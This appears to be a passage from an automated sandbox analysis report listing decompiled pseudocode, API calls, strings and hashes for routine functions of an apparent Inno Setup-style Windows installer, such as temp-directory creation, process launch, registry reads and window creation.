				_t147 = __fp0;
				_t95 = __ecx;
				_t23 = __eax;
				_t126 = __eax;
				_t131 = _t126 -  *0x6cd738; // 0x0
				if(_t131 == 0) {
					L28:
					return _t23;
				}
				_t24 =  *0x6d66f8; // 0x0
				_t93 = E00464CD0(_t24, __eax);
				_t1 = _t93 + 0x18; // 0x18
				_t100 = E0040A77C(_t1);
				_t28 =  *((intOrPtr*)(_t93 + 0x18));
				if(_t28 != 0) {
					_t28 =  *((intOrPtr*)(_t28 - 4));
				}
				E005CD600(_t100, _t95, _t28);
				E005C77C4();
				E005C77C4();
				 *0x6cd738 = _t126;
				_t104 =  *0x5cac34; // 0x5cac38
				E0040BFAC(0x6d66b8, _t104);
				_t98 =  *0x5cac34; // 0x5cac38
				E0040C278(0x6d66b8, _t98, _t93, _t147);
				if( *0x6d66e0 == 0x411 &&  *0x6d67f0 < 0x5010000 && E005C7F8C(L"MS PGothic", _t93) != 0) {
					E0040A5A8(0x6d66c8, L"MS PGothic");
					 *0x6d66ec = 0xc;
				}
				if( *((intOrPtr*)(_t93 + 0x1c)) == 0) {
					_t106 =  *0x6d6601; // 0x0
					E0040A644(0x6d6744, _t106);
				} else {
					E0040A644(0x6d6744,  *((intOrPtr*)(_t93 + 0x1c)));
				}
				if( *((intOrPtr*)(_t93 + 0x20)) == 0) {
					_t107 =  *0x6d6605; // 0x0
					E0040A644(0x6d6748, _t107);
				} else {
					E0040A644(0x6d6748,  *((intOrPtr*)(_t93 + 0x20)));
				}
				_t139 =  *((intOrPtr*)(_t93 + 0x24));
				if( *((intOrPtr*)(_t93 + 0x24)) == 0) {
					_t108 =  *0x6d6609; // 0x0
					E0040A644(0x6d674c, _t108);
				} else {
					E0040A644(0x6d674c,  *((intOrPtr*)(_t93 + 0x24)));
				}
				E005C9044( *0x6d66f4 & 0x000000ff);
				_t49 =  *0x6cded8; // 0x6d5c28
				_t10 = _t49 + 0x1e8; // 0x0
				E005C8FB8(0, _t98, E0040B278( *_t10), _t139);
				_t54 =  *0x6cded8; // 0x6d5c28
				_t11 = _t54 + 0xb0; // 0x0
				E005C8FB8(1, _t98, E0040B278( *_t11), _t139);
				_t59 =  *0x6cded8; // 0x6d5c28
				_t12 = _t59 + 0x164; // 0x0
				E005C8FB8(2, _t98, E0040B278( *_t12), _t139);
				_t64 =  *0x6cded8; // 0x6d5c28
				_t13 = _t64 + 0x164; // 0x0
				E005C8FB8(3, _t98, E0040B278( *_t13), _t139);
				_t113 =  *0x6cded8; // 0x6d5c28
				_t14 = _t113 + 0x2f8; // 0x0
				_t69 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t69,  *_t14, _t139);
				_t23 =  *0x6d6704; // 0x0
				_t128 =  *((intOrPtr*)(_t23 + 8)) - 1;
				if(_t128 < 0) {
					L26:
					if( *0x6d64a4 == 0) {
						goto L28;
					}
					_t72 =  *0x6d64a8; // 0x120262
					_t73 = SendNotifyMessageW(_t72, 0x496, 0x2711, _t126); // executed
					return _t73;
				} else {
					_t129 = _t128 + 1;
					_t130 = 0;
					do {
						_t74 =  *0x6d6704; // 0x0
						_t94 = E00464CD0(_t74, _t130);
						_t77 = ( *(_t94 + 0x25) & 0x000000ff) - 1;
						if(_t77 == 0) {
							_t17 = _t94 + 4; // 0x4
							_t116 =  *0x6cded8; // 0x6d5c28
							_t18 = _t116 + 0x1c8; // 0x0
							_t23 = E0040A5A8(_t17,  *_t18);
						} else {
							_t79 = _t77 - 1;
							if(_t79 == 0) {
								_t19 = _t94 + 4; // 0x4
								_t118 =  *0x6cded8; // 0x6d5c28
								_t20 = _t118 + 0x94; // 0x0
								_t23 = E0040A5A8(_t19,  *_t20);
							} else {
								_t23 = _t79 - 1;
								if(_t23 == 0) {
									_t21 = _t94 + 4; // 0x4
									_t120 =  *0x6cded8; // 0x6d5c28
									_t22 = _t120 + 0xb8; // 0x0
									_t23 = E0040A5A8(_t21,  *_t22);
								}
							}
						}
						_t130 = _t130 + 1;
						_t129 = _t129 - 1;
					} while (_t129 != 0);
					goto L26;
				}
			}





































                                                            0x006ae3c8
                                                            0x006ae3c8
                                                            0x006ae3c8
                                                            0x006ae3cc
                                                            0x006ae3ce
                                                            0x006ae3d4
                                                            0x006ae621
                                                            0x006ae621
                                                            0x006ae621
                                                            0x006ae3dc
                                                            0x006ae3e6
                                                            0x006ae3e8
                                                            0x006ae3f0
                                                            0x006ae3f2
                                                            0x006ae3f7
                                                            0x006ae3fc
                                                            0x006ae3fc
                                                            0x006ae3ff
                                                            0x006ae413
                                                            0x006ae427
                                                            0x006ae42c
                                                            0x006ae437
                                                            0x006ae43d
                                                            0x006ae449
                                                            0x006ae44f
                                                            0x006ae45e
                                                            0x006ae484
                                                            0x006ae489
                                                            0x006ae489
                                                            0x006ae497
                                                            0x006ae4ad
                                                            0x006ae4b3
                                                            0x006ae499
                                                            0x006ae4a1
                                                            0x006ae4a1
                                                            0x006ae4bc
                                                            0x006ae4d2
                                                            0x006ae4d8
                                                            0x006ae4be
                                                            0x006ae4c6
                                                            0x006ae4c6
                                                            0x006ae4dd
                                                            0x006ae4e1
                                                            0x006ae4f7
                                                            0x006ae4fd
                                                            0x006ae4e3
                                                            0x006ae4eb
                                                            0x006ae4eb
                                                            0x006ae509
                                                            0x006ae50e
                                                            0x006ae513
                                                            0x006ae522
                                                            0x006ae527
                                                            0x006ae52c
                                                            0x006ae53b
                                                            0x006ae540
                                                            0x006ae545
                                                            0x006ae554
                                                            0x006ae559
                                                            0x006ae55e
                                                            0x006ae56d
                                                            0x006ae572
                                                            0x006ae578
                                                            0x006ae57e
                                                            0x006ae585
                                                            0x006ae58a
                                                            0x006ae592
                                                            0x006ae595
                                                            0x006ae5fe
                                                            0x006ae605
                                                            0x00000000
                                                            0x00000000
                                                            0x006ae612
                                                            0x006ae618
                                                            0x00000000
                                                            0x006ae597
                                                            0x006ae597
                                                            0x006ae598
                                                            0x006ae59a
                                                            0x006ae59c
                                                            0x006ae5a6
                                                            0x006ae5ac
                                                            0x006ae5ae
                                                            0x006ae5ba
                                                            0x006ae5bd
                                                            0x006ae5c3
                                                            0x006ae5c9
                                                            0x006ae5b0
                                                            0x006ae5b0
                                                            0x006ae5b2
                                                            0x006ae5d0
                                                            0x006ae5d3
                                                            0x006ae5d9
                                                            0x006ae5df
                                                            0x006ae5b4
                                                            0x006ae5b4
                                                            0x006ae5b6
                                                            0x006ae5e6
                                                            0x006ae5e9
                                                            0x006ae5ef
                                                            0x006ae5f5
                                                            0x006ae5f5
                                                            0x006ae5b6
                                                            0x006ae5b2
                                                            0x006ae5fa
                                                            0x006ae5fb
                                                            0x006ae5fb
                                                            0x00000000
                                                            0x006ae59a

                                                            APIs
                                                            • SendNotifyMessageW.USER32(00120262,00000496,00002711,-00000001), ref: 006AE618
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessageNotifySend
                                                            • String ID: (\m$MS PGothic
                                                            • API String ID: 3556456075-219475269
                                                            • Opcode ID: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
                                                            • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                            • Opcode Fuzzy Hash: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
                                                            • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E0060D530(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x60d629);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E005C75E4( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E0060D294(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E0040B278(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E005CD508(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E0042302C( &_v36, _t54, 0);
						_v24 = _v36;
						E005C857C(_t54,  &_v40);
						_v20 = _v40;
						E005CD4D8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E00429008(_v16, 1);
						E004098C4();
					}
				}
				E0040A5A8(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E0060D630);
				E0040A228( &_v40, 3);
				return E0040A228( &_v16, 3);
			}


















                                                            0x0060d530
                                                            0x0060d530
                                                            0x0060d531
                                                            0x0060d533
                                                            0x0060d538
                                                            0x0060d538
                                                            0x0060d53a
                                                            0x0060d53c
                                                            0x0060d53c
                                                            0x0060d53f
                                                            0x0060d540
                                                            0x0060d542
                                                            0x0060d544
                                                            0x0060d546
                                                            0x0060d547
                                                            0x0060d54c
                                                            0x0060d54f
                                                            0x0060d552
                                                            0x0060d559
                                                            0x0060d561
                                                            0x0060d568
                                                            0x0060d578
                                                            0x0060d57f
                                                            0x00000000
                                                            0x00000000
                                                            0x0060d586
                                                            0x0060d588
                                                            0x0060d58e
                                                            0x0060d59e
                                                            0x0060d5a6
                                                            0x0060d5b2
                                                            0x0060d5ba
                                                            0x0060d5c2
                                                            0x0060d5ca
                                                            0x0060d5d9
                                                            0x0060d5de
                                                            0x0060d5e8
                                                            0x0060d5ed
                                                            0x0060d5ed
                                                            0x0060d58e
                                                            0x0060d5fc
                                                            0x0060d601
                                                            0x0060d603
                                                            0x0060d606
                                                            0x0060d609
                                                            0x0060d616
                                                            0x0060d628

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: 7e252bd83ff95b71af820973b8230fb04739544441579268b50ffd476fc0b7f1
                                                            • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                            • Opcode Fuzzy Hash: 7e252bd83ff95b71af820973b8230fb04739544441579268b50ffd476fc0b7f1
                                                            • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060F338, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0060F338(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, intOrPtr _a12, signed char _a16, char _a20) {
				intOrPtr _v8;
				struct _SHELLEXECUTEINFOW _v68;
				void* _t52;
				intOrPtr _t61;
				void* _t65;
				intOrPtr* _t67;
				void* _t70;

				_v8 = __ecx;
				_t65 = __edx;
				_t52 = __eax;
				_t67 = _a4;
				E0040A2AC(_a20);
				_push(_t70);
				_push(0x60f41c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xffffffc0;
				if(_a20 == 0) {
					E005C5378(_t65, __ecx,  &_a20);
					if(_a20 == 0) {
						E005C745C( &_a20);
					}
				}
				E00407760( &_v68, 0x3c);
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x540;
				if(_t52 != 0) {
					_v68.lpVerb = E0040B278(_t52);
				}
				_v68.lpFile = E0040B278(_t65);
				_v68.lpParameters = E0040B278(_v8);
				_v68.lpDirectory = E0040B278(_a20);
				_v68.nShow = _a12;
				ShellExecuteExW( &_v68); // executed
				asm("sbb ebx, ebx");
				_t53 = _t52 + 1;
				if(_t52 + 1 != 0) {
					 *_t67 = 0x103;
					_t39 = _v68.hProcess;
					if(_v68.hProcess != 0) {
						E0060EFD8(_t39, _t53, _a16 & 0x000000ff, _t65, _t67, _t67); // executed
					}
				} else {
					 *_t67 = GetLastError();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0060F423);
				return E0040A1C8( &_a20);
			}










                                                            0x0060f341
                                                            0x0060f344
                                                            0x0060f346
                                                            0x0060f348
                                                            0x0060f34e
                                                            0x0060f355
                                                            0x0060f356
                                                            0x0060f35b
                                                            0x0060f35e
                                                            0x0060f365
                                                            0x0060f36c
                                                            0x0060f375
                                                            0x0060f37a
                                                            0x0060f37a
                                                            0x0060f375
                                                            0x0060f389
                                                            0x0060f38e
                                                            0x0060f395
                                                            0x0060f39e
                                                            0x0060f3a7
                                                            0x0060f3a7
                                                            0x0060f3b1
                                                            0x0060f3bc
                                                            0x0060f3c7
                                                            0x0060f3cd
                                                            0x0060f3d4
                                                            0x0060f3dc
                                                            0x0060f3de
                                                            0x0060f3e1
                                                            0x0060f3ec
                                                            0x0060f3f2
                                                            0x0060f3f7
                                                            0x0060f401
                                                            0x0060f401
                                                            0x0060f3e3
                                                            0x0060f3e8
                                                            0x0060f3e8
                                                            0x0060f408
                                                            0x0060f40b
                                                            0x0060f40e
                                                            0x0060f41b

                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0060F3D4
                                                            • GetLastError.KERNEL32(00000000,0060F41C,?,?,?,00000001), ref: 0060F3E3
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                            • String ID: <
                                                            • API String ID: 893404051-4251816714
                                                            • Opcode ID: 0678bdbd1187e75fdc35b9897c4aaad201bcc0a8432d3eaa275722f57812bcfb
                                                            • Instruction ID: dcf8102ceadd4487f49ba87b12be971fda6b0883f73445cbcbdd13ac2b4765a0
                                                            • Opcode Fuzzy Hash: 0678bdbd1187e75fdc35b9897c4aaad201bcc0a8432d3eaa275722f57812bcfb
                                                            • Instruction Fuzzy Hash: 6C216D70A40209DFDB24EFA5C885ADE7BE9EF58394F50003AF800E7691E77899518B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 70%
                                                            			E006ACB10(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char* _t12;
				long _t13;
				void* _t15;
				void* _t22;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_t22 = __ebx;
				_push(0);
				_push(_t35);
				_push(0x6acba2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				E006255B8(0);
				E006255A4(0);
				if( *0x6d6530 != 0) {
					_t12 =  *0x6cdfdc; // 0x6d62e4
					if( *_t12 != 0) {
						E0061583C(0);
					}
					_t13 = GetTickCount();
					_t29 =  *0x6d6530; // 0x0
					_t15 = E0060DCC8(0, _t22, 1, _t29, _t13, E006ACABC, 0, 0, 1, 1); // executed
					if(_t15 == 0) {
						_t26 =  *0x6d6530; // 0x0
						E0040B4C8( &_v8, _t26, L"Failed to remove temporary directory: ");
						E00616130(_v8, _t22, _t31, _t32);
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E006ACBA9);
				return E0040A1C8( &_v8);
			}














                                                            0x006acb10
                                                            0x006acb10
                                                            0x006acb10
                                                            0x006acb13
                                                            0x006acb17
                                                            0x006acb18
                                                            0x006acb1d
                                                            0x006acb20
                                                            0x006acb25
                                                            0x006acb2c
                                                            0x006acb38
                                                            0x006acb3a
                                                            0x006acb42
                                                            0x006acb46
                                                            0x006acb46
                                                            0x006acb58
                                                            0x006acb60
                                                            0x006acb68
                                                            0x006acb6f
                                                            0x006acb74
                                                            0x006acb7f
                                                            0x006acb87
                                                            0x006acb87
                                                            0x006acb6f
                                                            0x006acb8e
                                                            0x006acb91
                                                            0x006acb94
                                                            0x006acba1

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CountTick
                                                            • String ID: Failed to remove temporary directory: $bm
                                                            • API String ID: 536389180-2673898769
                                                            • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                            • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                            • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                            • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E006AC180() {
				void* _v8;
				void* __ecx;
				void* _t9;
				long _t15;
				void* _t16;

				if( *0x6d67dd == 0) {
					_t16 = 0;
				} else {
					_t16 = 2;
				}
				_t9 = E005C7A14(_t16,  *((intOrPtr*)(0x6cd7ec + ( *0x6d67dc & 0x000000ff) * 4)), 0x80000002,  &_v8, 1, 0); // executed
				if(_t9 == 0) {
					E005C793C();
					E005C793C();
					_t15 = RegCloseKey(_v8); // executed
					return _t15;
				}
				return _t9;
			}








                                                            0x006ac18c
                                                            0x006ac192
                                                            0x006ac18e
                                                            0x006ac18e
                                                            0x006ac18e
                                                            0x006ac1b1
                                                            0x006ac1b8
                                                            0x006ac1c7
                                                            0x006ac1d9
                                                            0x006ac1e2
                                                            0x00000000
                                                            0x006ac1e2
                                                            0x006ac1ea

                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                            • API String ID: 3535843008-1113070880
                                                            • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                            • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00414DA0(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00407404();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004073F4(_t13);
				return _t24;
			}








                                                            0x00414da7
                                                            0x00414dac
                                                            0x00414dae
                                                            0x00414ddf
                                                            0x00414de8
                                                            0x00414df4

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 716092398-1824977358
                                                            • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                            • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E006AC0D0(void* __eax, void* __edx, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t7;
				void* _t17;
				void* _t24;

				_t24 = _t17;
				_t7 = E005C7A14(__eax, L"Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return E0040A1C8(_t24);
				}
				if(E005C793C() == 0) {
					E0040A1C8(_t24);
				}
				return RegCloseKey(_v8);
			}








                                                            0x006ac0d7
                                                            0x006ac0f1
                                                            0x006ac0f8
                                                            0x00000000
                                                            0x006ac11e
                                                            0x006ac108
                                                            0x006ac10c
                                                            0x006ac10c
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
